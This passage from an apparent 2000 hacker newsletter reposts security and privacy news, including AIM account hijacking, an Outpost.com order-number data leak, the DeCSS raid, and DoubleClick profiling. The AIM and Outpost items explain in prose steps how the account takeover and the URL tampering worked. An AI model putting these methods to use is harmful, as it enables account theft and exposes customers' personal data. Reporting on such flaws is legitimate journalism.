=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Contact ------- I can be contacted on IRC irc.wiretapped.net or on the email address marena@iinet.net.au =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Copyright 1999 QuadCon [This "how not to write a zine"-style document got this response from the people hosting the file (wiretapped.net):] http://the.wiretapped.net/security/textfiles/quadcon/response.txt @HWA 49.0 HNN: Jan 25: AIM Accounts Susceptible to Theft ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ AOL will always have problems of some sort, no matter what they do, the system is just too big and complex and the operators do not know more than the basics of how the user interfaces work expect to see many more AOL/AIM etc problems and exploits - Ed Oxymoron: "AOL tech support" From HNN http://www.hackernews.com/ contributed by no0ne A group of teenagers have discovered a way to take over any AOL Instant Messenger account as long as they know the person's screen name. A staff tool that was picked up from AOL's proprietary online service lets them exploit a hole in AOL 5.0's registration process, allowing them to reset users' passwords. During the AOL 5.0 registration process, AOL asks for a person's screen name. The teenagers enter the screen name they want to have, when prompted for a password they make one up to get the "invalid password" message. AOL 5.0 then buffers the screen name within the registration process. The perpetrators then jump to another part of the registration process where AOL thinks the intruder is the rightful owner of the AIM screen name and permits the password to be reset. AOL says it is working to correct the problem. C|Net http://news.cnet.com/news/0-1005-200-1530654.html?dtn.head ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2426698,00.html?chkpt=zdhpnews01 MSNBC http://www.msnbc.com/news/361415.asp Wired http://www.wired.com/news/business/0,1367,33881,00.html CNET; Hackers learn how to take over AOL IM accounts By Courtney Macavinta Staff Writer, CNET News.com January 24, 2000, 4:30 p.m. PT America Online Instant Messenger users could find their online identities stolen via a security hole that allows hackers to hijack their accounts through another popular service: AOL 5.0. A small band of hackers has discovered a way to take over any AOL Instant Messenger (AIM) account as long as they have a person's screen name. By using an AOL staff tool they unearthed while poking around the company's proprietary online service, they exploit a public hole in the AOL 5.0 registration process that lets them reset AIM users' passwords. Once the hackers do this handiwork, initial users of the screen names are locked out of their accounts, giving the hackers open access to users' "buddy lists" of other AIM users and the ability to maintain trial AOL 5.0 accounts under the same screen names, as confirmed by CNET News.com. AOL spokesman Rich D'Amoto said he hasn't heard of any complaints about stolen AIM screen names, but that the company is looking into the issue and will try to track down the hackers. "We're aware of the situation and we are deploying security measures to defeat the hackers," D'Amoto said. More than 40 million people have registered AIM screen names and use the program to carry on short conversations or send quick alerts to their friends or co-workers. AIM users can set up private buddy lists and never have to share their screen names with people they don't know. But many users give up their names freely in chat rooms or through AIM's "find a buddy" feature, which lets users search for someone to talk with based on a common interest, such as books or religion. The teen-age hackers who found the hole in AOL 5.0 say they have stolen more than a hundred names, such as "New York City." Some use the names they've seized to extract information about the person from friends and family. Mostly the ploy is a game. "We do it if we've seen someone we don't like in a private chat room," one of the hackers said in an interview. At one point, the high school senior said he tried to let AOL know about the hole. "If AOL would just listen to people like us instead of blowing us off and terminating our accounts, they could fix it," he said. Security holes usually aren't kid's stuff to a major company such as AOL, however. In the wake of high-profile privacy breaches by way of human error and email-based attacks, AOL has been forced to take security seriously to ensure its more than 20 million members that their personal information, e-commerce transactions and communications are protected on its service. AOL wants AIM registrants to feel safe, too; their frequent and consistent activity adds up to lucrative advertising dollars for AOL. And AOL's quality control and privacy measures will only become more important--and potentially harder to manage--as its acquisition of Time Warner takes shape. AOL will likely try to close the loophole in the registration process that allows the hackers to assign a new password to the account. Here's how it works: At one point in the 5.0 registration process, AOL asks for a person's screen name. The hackers enter the screen name they intend to steal, but when asked for a password, they simply guess and get an "invalid password" message. The trick is that AOL has "buffered," or remembered, the screen name within the registration process. The hackers then use a tool that lets them jump to another part of the registration process. Once these steps have been taken, AOL thinks the hacker is the rightful owner of the AIM screen name and later on in the registration process permits the password to be reset. Security experts say such abuses aren't rare. "These software faults are more common than most people think; it's more common than we would like," said Elias Levy, of the consulting firm Security Focus. "Most companies, their first reaction is to deny the problem and then go into damage recovery mode and fix the problem without acknowledging it." Although AIM users could simply register a new screen name, Levy said that having a name stolen could be more of a concern for people who use messenger or chat programs for professional reasons. "It can be nerve wracking if someone stole your online personality," he said. AOL said that if a person has had their AIM screen name stolen, for now they can use the program's "forgot password" feature to have an email sent to the address they provided at registration that includes the account's current password. Then the original holder of the screen name can reset the password once again. -=- -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- Hackers impersonate AOL users By Lisa Napoli, MSNBC January 24, 2000 6:09 PM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2426698,00.html?chkpt=zdnntop Since November, a group of teenagers say they have been stealing AOL Instant Messenger screen names and masquerading as their rightful owners. The hackers sometimes act as imposters and pilfer credit card numbers and other personal data from friends and family of the exploited online users. The hackers demonstrated their method to MSNBC on Monday. According to a letter the hackers sent on Sunday to members of the technology press, they use the names "just for the pure joy of trying to ruin friendships by insulting friends who have no idea they are talking to a hacker and not the victim." The hackers say they have contacted the media because AOL (NYSE: AOL) had not responded to their notification to them of the security hole. An AOL spokesman, Rich D'Amato, said on Monday afternoon, "We are aware of the situation and are deploying security measures to defeat it. When hacker behavior crosses the line into illegal action, we'll certainly bring it to the attention of authorities." D'Amato would not specify how many people had been affected or pinpoint the time line, saying those details could affect the investigation. "AOL is so easy to abuse, it's pathetic," said TangentX, who says he is 17- years-old and, along with two others, found the security hole this fall. They discussed it, he said, in special private chat rooms on AOL for hackers and use of the so-called "exploit" spread. He estimates that 400 names have been stolen to date. AOL press materials say that 45 million people have created AOL Instant Messenger screen names as of last August. The popular software allows online users to chat privately, almost in real time, with others who have the software. AOL also owns ICQ, another popular instant messaging program, which claims 50 million registered users. TangentX says he and others have found several ways to make an instant message screen name into an AOL account without the password. One involves resetting a password for a screen name through a security hole. The other involves taking a screen name, creating an AOL account for it and then changing the password. When he was given a screen name on Monday afternoon by MSNBC, TangentX was able to access the account and send an instant message from the name in a matter of minutes. -=- MSNBC; Fuck em, check the link yourself. :-/ (No I don't like Micro$loth) -=- Wired; Hack Takes Aim at AOL Clients Wired News Report 5:30 p.m. 24.Jan.2000 PST A security breach on AOL Instant Messenger put the privacy of AIM users at risk on Monday, according to a published report. The breach, first reported in Salon, allows subscribers to link new AOL accounts to AIM names that already exist. Holes in the sign-up process allow people to get around the password protection of the AIM accounts. "We are aware of it and are deploying security measures to defeat it," said Rich D'Amato, a spokesman for AOL. AOL's online service is used to changed passwords, so hackers are easily able to open new accounts using the existing AIM user's name. People who subscribe to AOL are not affected by the breach. People who use instant messaging software (AIM) outside of AOL, are. D'Amato called the security breach an example of "hacker behavior that crosses the line into illegal action." "Our intention is to investigate this and when we identify an individual or groups of individuals, we intend to bring this to the attention of the proper law enforcement authorities," D'Amato said. He declined to speculate on when the problem will be fixed or how many users were affected, although he characterized it as "a very small number." David Cassel, who edits the AOL Watch mailing list, claimed the security hole was easily preventable. It was simply a matter of someone thinking through the sign-on process. "AOL left a gaping hole in the way they implemented it," Cassel wrote in an email. "Those who happened to have an AOL account weren't vulnerable, but everyone else was. To promote such an easily cracked software really violates any reasonable expectation of security. In that sense, all AIM users were affected." "AOL is a marketing company, not a technology company," Cassel wrote. "They mass-promoted a software that's vulnerable to easy attacks." @HWA 50.0 HNN: Jan 25: Outpost Leaks Customer Info ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench By changing the order number in the URL users at Outpost.com are able to view the personal information, including the type of credit card used, of other users. An Outpost spokesperson said that the problem would be fixed immediately. (This type of problem is extremely old, it is surprising that such a large company such as Outpost has this problem. This just further illuminates the need for effective e-commerce security.) Wired http://www.wired.com/news/technology/0,1282,33842,00.html Outpost Leaves Data Unguarded by Chris Oakes 1:25 p.m. 24.Jan.2000 PST While James Wynne was checking his online order Friday at Outpost.com, he noticed something curious -- he could check orders from other people, too. He noticed that the long Web page address for his transaction included his order number, and decided to see what happened if he changed a digit to try and access other customers' records. The modified address pulled up the same detailed transaction summary for another customer's order number -- including a full range of sensitive, and valuable, personal data. "You can see someone's email address, their billing address, their shipping address, type of credit card they used, their order history -- everything they bought, everything they received, everything they're currently waiting for," Wynne said. In addition to exposing nuggets of information about individuals -- tying their email identity to their street address, and revealing recent purchases -– the security glitch could be exploited by marketers to build databases of target customers, said Wynne. "I could set up data-mining program that would check random [order] numbers and find out all people who bought PalmPilots at Outpost.com," he said. Outpost.com acknowledged the flaw Monday and said it would have the problem fixed by the end of the day. But the vulnerability did not represent a dramatic risk, the company said. Most commerce sites prevent the simple searching of their database by encrypting or otherwise preventing the data from appearing in URLs. "It shouldn't be there, but it is," said Outpost.com spokesman Craig Andrews. "It's sort of hidden buried away in the URL," he said, claiming that only hackers looking for holes would be able to find it. Furthermore, he said, while the hole revealed both personal and purchasing information, it did not betray credit card numbers or other vital financial information. "It's unfortunate that pricing and product information is there. But the other personal information is all over the place. You can go to a place like [Web information directory] 411 and get addresses and personal email." However, Andrews acknowledged that people generally volunteer the information in directory services, and purchasing information is not included. Ray Everett-Church, chief privacy officer at Alladvantage.com and longtime spam-watcher, said the flaw is more of a threat than Outpost portrayed it to be. "I would certainly consider this a threat to not only integrity of data privacy promises a site might make, but certainly to the kinds of confidence level that companies should be trying to instill in consumers," Everett-Church said. "It causes folks to question the security of these transactions and the advisability of entering into them in the first place." Was it an oversight that led to the hole? Technically, yes, but not really, said Outpost.com's Andrews. "Between management of the site and the software they use to manage orders, it was just something that hadn't come up.... It wasn't really an oversight by the textbook definition." Everett-Church said he doesn't think the public hears about personal data vulnerabilities nearly as often as they occur. "I think these sorts of Web ordering systems have these problems quite frequently -- probably more frequently than we realize. All it takes is a clever hacker to keep poking and prodding at the systems to find these kinds of weaknesses." @HWA 51.0 HNN: Jan 25: DeCSS Author Raided ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Zorro The National Authority for Investigation and Prosecution of Economic and Environmental Crime in Norway has raided the home of Jon Johansen of Steinsholt Norway. Jon is the author of the controversial software DeCSS. Authorities confiscated his computer and cellphone, they also questioned him for up to seven hours. Both Jon and his father have been charged with breaking the copyright act and the penal law which could result in up to 3 years in prison. Slashdot http://slashdot.org/articles/00/01/24/2024233.shtml VG - Norwegian http://www.vg.no/pub/vgart.hbs?artid=5712180 TV 2 - Norwegian http://www2.tv2.no/nyss/n2i.vis?par=70&par=1623664&ext=378097 @HWA 52.0 HNN: Jan 25: Solaris May Go Free and Open ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Jay When Solaris 8 is unveiled Wednesday in New York it is expected that Sun will also announce that the software will be free as well opening access to the software's source code. Solaris 8 is expected to ship in February. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2426200,00.html -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- Sun fights Linux, WinNT with 'free Solaris' By Deborah Gage, Sm@rt Reseller January 24, 2000 8:58 AM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2426200,00.html?chkpt=zdhpnews01 Sun Microsystems Inc. is expected to eliminate licensing fees for Solaris 8 to boost its appeal against Linux and Microsoft Windows NT, say sources close to the company. Sun is expected to make its "free Solaris" campaign the centerpiece of its Solaris 8 unveiling, which takes place this Wednesday in New York City. At that event, Sun also is expected to announce it will open up access to Solaris 8 source code. Solaris 8 is due to ship in February, around the same time Microsoft is due to ship Windows 2000. McNealy: Set it free Sun CEO Scott McNealy has been laying the groundwork for the announcement for months by telling audiences that software is a service and should be free. McNealy recommended last year that the government require Microsoft to make free and open its application program interfaces, rather than break itself into pieces, as a preferred remedy in the current Department of Justice vs. Microsoft antitrust investigation. "Free" is a relative term, however. Sun in December eliminated fees for Java 2 Standard Edition but still requires developers to pay for compatibility tests required to maintain their licenses. And Linux advocates and other industry watchers have claimed that the Sun Community Source License is not as free or open as Linux and other open-source licenses are. Sun will pitch Solaris 8 against Microsoft's high-end Windows 2000 package called Windows 2000 Datacenter, which is in beta and won't be commercially available until midyear, at best. Sun in November announced a free early access version of Solaris 8. Sun is positioning Solaris 8 as the most scalable and reliable network operating system on the market. Microsoft, which stepped up its Windows 2000 marketing campaign within the past week, in anticipation of the Feb. 17 rollout of the product, is touting Windows 2000's reliability as its main selling point. Zander: We'll never do Linux Microsoft's not Sun's only worry. Sun must fend off growing encroachments by Linux, which not only is free but also is becoming more robust with help from Sun competitors IBM Corp., Intel Corp. and Hewlett-Packard Co. Sun President Ed Zander told financial analysts last week that Sun will never adopt Linux as its operating system but will instead "put every ounce of R&D we have into Solaris." "It amazes me to watch IBM and all those other companies chase Linux the way they did Windows NT five years ago," Zander said. Sun has been working for over a year to offer Solaris under the Sun Community Source License but was stymied by the fact that it didn't own all the intellectual property inside Solaris. SCSL is a quasi open-source license that requires developers to return bug fixes to Sun, maintain compatibility and pay fees to Sun when they ship binaries based on Sun source code. It is unclear how Sun has resolved its intellectual property issues. But that isn't stopping the company from working to get on the good side of the open-source community. Sun is sponsoring ApacheCon 2000, the first official conference of the Apache Software Foundation upcoming in March, and is helping with the Apache Foundation's Jakarta and Java Apache projects. @HWA 53.0 HNN: Jan 25: Documents Prove Echelon not a Journalist Fabrication ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Brian Oblivion For years DoD officials have claimed that the global eavesdropping network known as Echelon was nothing more than a myth fabricated by journalists. Now recently declassified papers by the NSA actually confirm the existence of the operation. The NSA Declassified http://www.gwu.edu/~nsarchiv/NSAEBB/NSAEBB23/index.html (Go to the url theres a lot of material there - Ed) @HWA 54.0 HNN: Jan 25: Japan Needs US Help With Defacements ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench On Monday Japan's Science and Technology Agency and Japan's Management and Coordination Agency had their web sites defaced. This is con in the first-ever defacement of a Japanese government computer system. Japanese officials have said that they will be seeking assistance from US officials in tracking down the perpetrators. Reuters - via Yahoo http://dailynews.yahoo.com/h/nm/20000125/wr/japan_hackers_1.html Tuesday January 25 12:44 AM ET Japan Says to Seek U.S. Help to Deal With Hackers TOKYO (Reuters) - Japan said on Tuesday it will seek help from the United States in an investigation into hackers who penetrated two government Web sites. Computer systems at Japan's Science and Technology Agency were raided on Monday and its homepage was replaced with derogatory messages insulting the Japanese in the first-ever hacking of a Japanese government computer system. Agency officials declined to give details of the derogatory messages. The homepage was also replaced with a direct access switch to adult magazine web sites, agency officials said. Several hours later, Japan's Management and Coordination Agency also discovered a similar incident at its Web site. Top government spokesman Mikio Aoki said the government would launch an extensive investigation into the incident, including possible help from Washington which was more advanced in dealing with hackers. ``The government must take all necessary measures including seeking help from the United States,'' Aoki told a regular news conference. An agency spokesman said it was not immediately clear whether the same hacker was responsible for the two separate cases of infiltration. @HWA 55.0 HNN: Jan 25: Car Radios Monitored by Marketers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Soon we'll have to wear implants in our penises so that condom manufacturers can collect stats on how often their product is used for fucking. - Ed From HNN http://www.hackernews.com/ contributed by Evil Wench Originally developed as a means to gather real time Radio ratings information, technology created by Alabama based MobilTrak is now being used by marketers. The road side devices hone in on emissions from car radios to determine exactly what station they are turned to. Now concert promoters are using the technology to determine what station concert attendees listen to as they park cars their cars when attending concerts. Wired http://www.wired.com/news/technology/0,1282,33799,00.html Your Ears Are Their Business by Noah Shachtman 3:00 a.m. 25.Jan.2000 PST Even in the car, there's no hiding from marketers' prying eyes -- and ears. Companies like concert mega-promoter SFX Entertainment are using a new device to find out what's being played on customers' radios as they pull into venue parking lots. The information is supposed to help businesses gauge the effectiveness of radio advertising campaigns. But the system -- built by Alabama start-up Mobiltrak and installed at 13 SFX locations in Los Angeles, Phoenix, Atlanta, and elsewhere -- is coming under fire from privacy experts. "Nobody would think that they're being monitored in a parking lot. And nobody would think that there's something of value in listening to a radio station while they're in that parking lot," said Brooklyn Law School professor Paul Schwartz. But there is something of value here, and the people listening don't get any of that value. They're being polled without knowing they're in a poll." By contrast, when the local supermarket videotapes your weekly grocery run, or Dell monitors your tech support call -- even when SFX tracks your visit to its Web site -- the companies let you know you're being observed. The major traditional measurement companies, like The Arbitron Company and Nielsen Media Research pay a small stipend to the people they survey. Mobiltrak counters that such efforts aren't needed with their system. Individual cars aren't being tracked, they argue, so there's no invasion of an individual's privacy. "We can't link to a particular automobile. It's just not technically possible," claims Lucius Stone, Mobiltrak's director of sales and marketing. "It's a high-volume, random sample. It can only measure one radio at a time. And there's no way of telling which radio it is. It's most analogous to a traffic counter." The technology relies on a simple principle: Every FM radio is not only a receiver, but a transmitter, too, emitting the same radio frequency (or "RF") as the station to which it's tuned. That's why airlines ask passengers to turn off their radios during takeoff and landing: to prevent interference with pilots and air traffic controllers' communications. Mobiltrak picks up these RFs leaked from car radios' oscillators, and counts what stations are being played. Many in the privacy community fear that the temptation to use this information to breach established bounds of discretion will be too great for Mobiltrak to resist. "If it's merely aggregate information, not tied to an individual, then it's not really a concern," says Jason Catlett, president of consumer privacy group Junkbusters. "But there's an economic incentive to get down to the individual level, and a precedent for using the same technology to look at the individual householder." Like Mobiltrak, the British Broadcasting Company scrutinizes RF emissions. By law, British residents must have licenses for the television sets they own. The BBC deploys vans equipped with oscillation detectors to residential neighborhoods to enforce the law. The vans track which homes are equipped with TV sets, and then checks again to make sure that the residents have licenses for the TVs. "TV license enforcement is the main reason that women end up in prison in the UK," University of Cambridge cryptographer Ross Anderson wrote in an email. "The detector vans operate during the day, so when they find an unlicensed set and knock on the door, it's usually a woman who answers. A fine of 1,000 pounds is imposed, and if she can't pay it she goes to jail." What's more, Anderson and his colleagues have shown that the U.S. National Security Agency and others have long been able to use RF emissions to reconstruct what's on a computer monitor. But this invasive operation is a far cry from what Mobiltrak is doing, say some media business insiders. "I haven't met one person in the radio industry that's the least bit concerned about this from a privacy standpoint, as it currently exists," reports Ron Rodrigues, editor-in-chief of the trade magazine Radio & Records. Still, Rodrigues acknowledges, "We seem to be in a period when disclosure is becoming more important. With Mobiltrak, there may have to be some sort of disclosure that people are being monitored, like radar on the California highways." Schwartz, the Brooklyn law professor, believes something more than notification may be in order. "We can collect all this information in new ways. But who should get the benefits of this information?" he asks. "Is it like minerals on the deep sea bed outside the continental shelf, exploitable for whoever can get to it first? Or should we return some of the benefits in more direct ways to the people who created it?" @HWA 56.0 HNN: Jan 26:DoubleClick Admits to Profiling of Surfers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Code Kid Internet Advertising Agency Doubleclick, has started to match up web surfing habits with actual names and addresses, according to USA Today. DoubleClick's recent acquisition of Abacus Direct Corp , a direct-marketing services company that maintains a database of names, addresses, telephone numbers and retail purchasing habits of 90% of American households has made this possible. By matching surfing habits with actual names and addresses Doubleclick is better able to target ads and offer 'personalized' service. The Electronic Privacy Information Center plans to file a complaint with the Federal Trade Commission by Feb. 16. USA Today http://www.usatoday.com/life/cyber/tech/cth211.htm C|Net http://news.cnet.com/news/0-1005-200-1531929.html?dtn.head USA Today; Activists charge DoubleClick double cross Web users have lost privacy with the drop of a cookie, they say By Will Rodger, USATODAY.com Say goodbye to anonymity on the Web. DoubleClick Inc., the Internet's largest advertising company, has begun tracking Web users by name and address as they move from one Web site to the next, USATODAY.com has learned. The practice, known as profiling, gives marketers the ability to know the household, and in many cases the precise identity, of the person visiting any one of the 11,500 sites that use DoubleClick's ad-tracking "cookies." What made such profiling possible was DoubleClick's purchase in June of Abacus Direct Corp., a direct-marketing services company that maintains a database of names, addresses and retail purchasing habits of 90% of American households. With the help of its online partners, DoubleClick can now correlate the Abacus database of names with people's Internet activities. Company spokeswoman Jennifer Blum said Tuesday that only about a dozen sites are participating now. But she acknowledged that DoubleClick would like all its partner sites to participate. DoubleClick defends the practice, insisting that it allows better targeting of online ads -- and thus makes consumers' online experiences at once more relevant and more profitable for advertisers. The company calls it "personalization." Consumer advocates have another term for it: privacy invasion. After being informed of DoubleClick's actions, several privacy activists said they would file a formal complaint with the Federal Trade Commission next month. "This is a blatant bait-and-switch trick," says Jason Catlett of Junkbusters Inc., an Internet-privacy consultancy. "For four years they have said (their services) don’t identify you personally, and now they're admitting they are going to identify you." To tie Doubleclick's "anonymous" records of your surfing habits to its Abacus database, it needs only the cooperation of another site that can identify you positively. Futuristic though that sounds, positive identification is actually simple. DoubleClick need only tie your cookie to another one placed by a site that ships you something through the mail, or one which requires registration. To do that: DoubleClick sends a cookie to your browser and gives it a unique ID number. Doubleclick sends the same ID number on to the site that knows who you are. That company then sends back the data that DoubleClick needs to look you up in the Abacus database. And voila -- DoubleClick knows who you are, too. The combination of DoubleClick's cookie-derived information -- more than 100 million files -- with Abacus' database on the purchasing habits of 90 million households means the vast majority of Web-connected Americans will likely lose their online anonymity, says David Banisar, deputy director of Privacy International. DoubleClick's Blum said she was not sure whether surfing habits tracked by DoubleClick before Abacus data are merged will be included in future profiles. DoubleClick executives maintain they still give users who don't want to be tracked a chance to opt out. "That person will receive notice that their personal information is being gathered," DoubleClick Senior Vice President and Abacus unit chief Jonathan Shapiro says flatly. Yet, that chance to opt out comes only in the form of a few lines of text placed in the privacy policies of participating Web sites. Since those policies are often buried two or three levels down, online consumers will seldom know what is being done with their personal information in the first place, let alone that they may opt out, activists say. "That is not permission," Banisar says. "That is fraudulent on its face." Catlett, Banisar and the Electronic Privacy Information Center plan to file a complaint with the Federal Trade Commission by Feb. 16. They say they will charge that DoubleClick has duped consumers by suggesting the company's technology lets them remain anonymous. They expect to enlist a wide array of consumer groups to back their position. Further troubling to privacy advocates is DoubleClick's refusal to say which Internet sites are furnishing them the registration rolls that DoubleClick needs to link once-anonymous cookies to names, addresses, phone numbers and catalog purchases. "The fact that DoubleClick is not disclosing the names of the companies who are feeding them consumers' names is a shameful hypocrisy," Catlett says. "They are trying to protect the confidentiality of the violators of privacy." Shapiro Tuesday bristled at Catlett's characterization. Any company that uses data from the Abacus database to target Internet ads must disclose it online, he says. Moreover, he adds, DoubleClick itself would hand over to privacy advocates the list of participating companies if it could. But as in many lines of business, partners frown when their relationships are disclosed without their permission, he says. "If they all bought a billboard and said they work with us, that would be great," Shapiro says. The controversy over DoubleClick began last summer, when the company announced it was buying Abacus Direct in a deal valued at more than $1 billion. Privacy experts had feared that DoubleClick would begin merging the two databases at some point. But they say they were unaware that DoubleClick had begun its profiling practice late last year. Before its Abacus purchase, DoubleClick had made its money by targeting banner advertisements in less direct ways. DoubleClick ad-serving computers, for instance, check the Internet addresses of people who visit participating sites. Thus, people in their homes may see ads different from those seen by workers at General Motors, or a machine-tool company in Ohio. Every time viewers see or click on those banners, DoubleClick adds that fact to individual dossiers it builds on them with the help of the cookies it drops on users' hard drives. Those dossiers, in turn, help DoubleClick target ads more precisely still, increasing their relevance to consumers and reducing unnecessary repetition. Those cookies remained anonymous to DoubleClick until now. Being tracked as they move around the Web "doesn’t measure up to people's expectation on the Net," says Robert Smith, publisher of the newsletter Privacy Journal. "They don't think that their physical locations, their names will be combined with what they do on the Internet. If they (DoubleClick) want to do that they have to expose that plan to the public and have it discussed." -=- CNET: Privacy fears raised by DoubleClick database plans By Courtney Macavinta Staff Writer, CNET News.com January 25, 2000, 8:10 p.m. PT Having sealed its purchase of a direct marketing company, DoubleClick has begun signing up sites to create a network that will tie Web surfers' travels with their personal information and shopping habits--online and off. The leading Web advertising company plans to build a database of consumer profiles that will include each user's "name, address, retail, catalog and online purchase histories, and demographic data," according to the company's new privacy policy. The database, which the company says will only be seen by DoubleClick, is intended to help members of its budding, U.S.-based Abacus Alliance perfect their target marketing. The move comes a little over a month after New York-based DoubleClick completed its $1.7 billion acquisition of Abacus Direct and in the wake of the Federal Trade Commission's November probe on the growing trend of online profiling. Privacy advocates, who protested the deal from the start, have unsuccessfully tried to get the FTC to review the implications of the merger because they say it means one thing for consumers: less privacy. Until recently, DoubleClick's policy was to not correlate personal information with its 100 million cookies, which are scattered worldwide. But the new database will rely on the cookies, which the company places on Net users' computers to record surfing habits and display pertinent advertising. Net users aren't informed when they are given a DoubleClick cookie unless their browser is preset to do so, but they can "opt out" through the company's Web site. The more than 11,500 sites that belong to DoubleClick's network could feed into the new database, which will correlate with the personal information in Abacus' existing database of more than 2 billion consumer catalog transactions. The rollout was first reported by USA Today. DoubleClick says that not all of the sites using its ad technology will join the alliance. "They have to somehow have something to give to be a member of this," said Jennifer Blum, DoubleClick's spokeswoman. The new database works like this: In the past, if a person named Jane Doe had a DoubleClick cookie that detected that she loved golf-related sites, the company could show her ads for sports-related content. But in the future, if the same surfer gives personal information to a member of the Abacus Alliance, DoubleClick will know a lot more about her: that her name is Jane Doe, and that she used to buy sweaters and pants via Company X's catalog but hasn't done so for years. However, Jane did buy a coat online last month. Now DoubleClick can advise Company X to target Jane with Net ads instead of sending her a catalog. "Yes, of course this will be done," Blum said. "The goal here is to match up the information." DoubleClick says that the focus of the alliance is to eliminate junk mail and to give consumers information about products they want. But privacy advocates charge that the combined companies are finally acting on their potential to create one of the most extensive consumer profiles ever. "Privacy advocates have been saying for years that marketers will turn the Net into a gigantic data-gathering machine for junk mail, telemarketing and advertising; now that machine is working," said Jason Catlett, founder of Junkbusters, a clearinghouse for privacy-protection measures. DoubleClick contends that before members of the Abacus Alliance put information into the new database, they must inform consumers. "Going forward, when a consumer puts in personal information to a Web site that is a member of this alliance, they will be told that the information will be shared with other parties," Blum said. "Consumers are given notice and choice if they want to opt out." Blum said that once companies join the alliance they also must give Net users notice that their information is going to be shared--even if that person has shared information with the Web site before. But privacy watchdogs say an opt-out policy is not fair to consumers who may not realize that when a company says their information is being shared with a "third party," it's really the potentially enormous DoubleClick database. "DoubleClick is trying to characterize this as choice, but its practice is based on opt out, not opt in," Catlett said. "We said this would happen-- behold it quietly has." @HWA 57.0 HNN: Jan 26: Support for DeCSS Author Grows ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Gee the EFF is supporting this case? i'm amazed. - Ed From HNN http://www.hackernews.com/ contributed by Jan and Zorro Support for Jon Johansen, the 16 year old Norwegian author being persecuted by the MPA, is growing. Johansen and his father where arrested and their computer equipment confiscated yesterday. They were charged with violation of copyright laws. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2427192,00.html?chkpt=zdnntop C|Net http://news.cnet.com/news/0-1005-200-1531192.html?tag=st.ne.ron.lthd.1005-200-1531192 Wired http://www.wired.com/news/business/0,1367,33889,00.html CNN http://cnn.com/2000/TECH/ptech/01/25/dvd.charge/index.html Aftenposten - English version http://www.aftenposten.no/english/local/d121315.htm Electronic Frontier Foundation http://www.eff.org/IP/Video/DeCSS_prosecutions/Johansen_DeCSS_case/20000125_eff_johansen_case_pressrel.html ZDNet; -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- DVD hacker arrested in Norway By Reuters January 25, 2000 11:30 AM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2427192,00.html?chkpt=zdnnto p A Norwegian teenager has been charged with distributing a software program that enables users to make unauthorized copies of DVD movies, police said on Tuesday. Jon Johansen is thought to have developed a program "that breaks the entire copyright protection of the DVD (digital versatile disc) system," said Inger Marie Sunde, a senior public prosecutor at Norway's economic crime unit. "He is charged with breaking intellectual property laws," said Sunde. Johansen's father was also charged in the case, since the teen posted the source code on a Web site owned by his father. Johansen refuted the charges in a CNN Norway article, saying that he has done nothing wrong. The 16-year-old student stressed that the program he and others on the Internet created was only meant for playing DVDs on computers running the Linux operating system. Previously, when the movie industry contacted him and asked him to remove the source code, he complied so as to avoid a lawsuit. Despite his cooperation, the movie industry is suing anyway. Major Hollywood studios, which use an encryption scheme on their DVDs to prevent unauthorized copying, have already taken legal action against three people in the United States who displayed Johansen's program on their Web sites. Computer equipment confiscated His program, known as DeCSS, is thought to have been the first program posted to the Internet that resulted from reverse engineering the DVD copy protection system. Norwegian law firm Simonsen Musaeus said in a statement it had reported Johansen and his father, Per Johansen, to the police earlier this month on behalf of the Motion Picture Association (MPA), a lobby group for seven major Hollywood studios. Sunde told Reuters police had questioned Jon Johansen late on Monday, searched his home and confiscated computer equipment. "He is a suspect, and we found that there were reasonable grounds for a search," she added. Other sites reported that two computers, a cell phone and some CDs had been taken by police. In addition, Johansen had to inform police of all his passwords. Simonsen Musaeus acts on behalf of U.S. license agency DVD Copy Control Association and the MPA, which represents major Hollywood studios such as Sony's Sony Pictures Entertainment Inc., Seagram Co. unit Universal Studios Inc. and Warner Bros., a Time Warner Inc. (NYSE: TWX) unit. A U.S. district court in New York on Friday ordered three people to remove Johansen's DeCSS program from their Web sites after the MPA filed a complaint. DVDs store sound and pictures digitally on an optical disc with a storage capacity considerably greater than that of a regular CD-ROM. -=- CNET; Teen charged in connection with DVD cracking tool By Courtney Macavinta Staff Writer, CNET News.com January 25, 2000, 5:00 p.m. PT update Norwegian police questioned and charged a 16-year-old student who sent the U.S. movie industry into a frenzy when he helped create a program that breaks the encryption on DVDs that spread like wildfire on the Net. In an interview today, Jon Johansen said that police raided his house yesterday to collect evidence stemming from allegations that he violated trade secrets to create a program called DeCSS, which cracks the security code in the DVD Content Scrambling System. That, in turn, allows people to view digital movies through unauthorized players, such as computers running the Linux operating system. Police seized several computers, a Nokia cellular 